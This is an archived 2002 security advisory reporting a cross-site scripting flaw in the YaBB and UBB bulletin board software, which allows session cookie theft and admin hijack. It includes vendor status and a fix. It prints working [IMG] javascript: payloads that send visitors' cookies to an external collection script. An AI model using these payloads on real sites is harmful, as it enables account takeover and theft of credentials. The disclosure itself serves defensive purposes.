Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor] Release Date: 08/01/2002 Application: YaBB and UBB Platform: Any system supporting PERL. Build - YaBB : 1 Gold - Service Pack 1 - older versions were effected in the same way. UBB : Ultimate Bulletin BoardTM 6.2.0 Beta Release 1.0 Severity: Malicious users can steal session cookies, allowing administrative access to the bulletin board. Author: Obscure^ [ obscureat_private ] Vendor Status: YaBB - Informed on 01 Jan 2002, should fix some time in the future ... UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems like they knew about the issue). Web: http://yabb.xnull.com http://www.infopop.com/products/ubb/ http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html Background. (extracted from http://yabb.xnull.com) YaBB is a leading provider of FREE, downloadable Perl forums for webmasters, with currently over 50,000 web communities using YaBB worldwide, and over 1 million registered users througout these forums! Join the messaging revolution; keep visitors coming back.... (extracted from http://www.infopop.com/products/ubb/) The Ultimate Bulletin Board (UBB)™ is the most widely adopted Perl message board on the Web. With a solid five year development history, and worldwide familiarity, it is easy to use and maintain. Problem. When a user inserts [IMG]url[/IMG], YaBB changes that text to <img src='url'>. If someone inserts javascript:alert() instead of the url, the javascript code is executed by Internet Explorer or some other web browsers. This allows stealing of cookie data and other interesting things. YaBB has filtered the javascript method, however it does not take into consideration that javascript: can be encoded using standard HTML hex and ASCII encoding. Same with UBB. In UBB I need to encode several strings because they added checking for certain keywords such as cookie. In my example I change javascript: to javascript: Exploit Example. Inserting a new topic (or reply) with the following text will send visitor's cookies to Eye on Security. The output is saved to http://eyeonsecurity.net/tools/cookies.txt . Cookies will contain the password in the case of UBB and a session cookie (or encoded password) in YaBB. -- snap YaBB -- [img]javascript:document.write ('<img src=http://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(docu ment.cookie)+'>') [/img]. -- snap YaBB -- -- snap UBB -- [IMG]javascript:document.write ('<img%20src=http://eyeonsecurity.net/tools/cookie.plx? cookie='+escape(document.cookie)+'>') [/IMG] -- snap UBB -- Fix. IMG tags should start with http, so that Javascript: and other goodies (play with mailto:) are not allowed. Note. Other Bulletin Board Systems may also be vulnerable to these attacks. Disclaimer. The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility. Feedback. Please send suggestions, updates, and comments to: Eye on Security mail : obscureat_private web : http://www.eyeonsecurity.net
This archive was generated by hypermail 2b30 : Wed Jan 09 2002 - 11:46:45 PST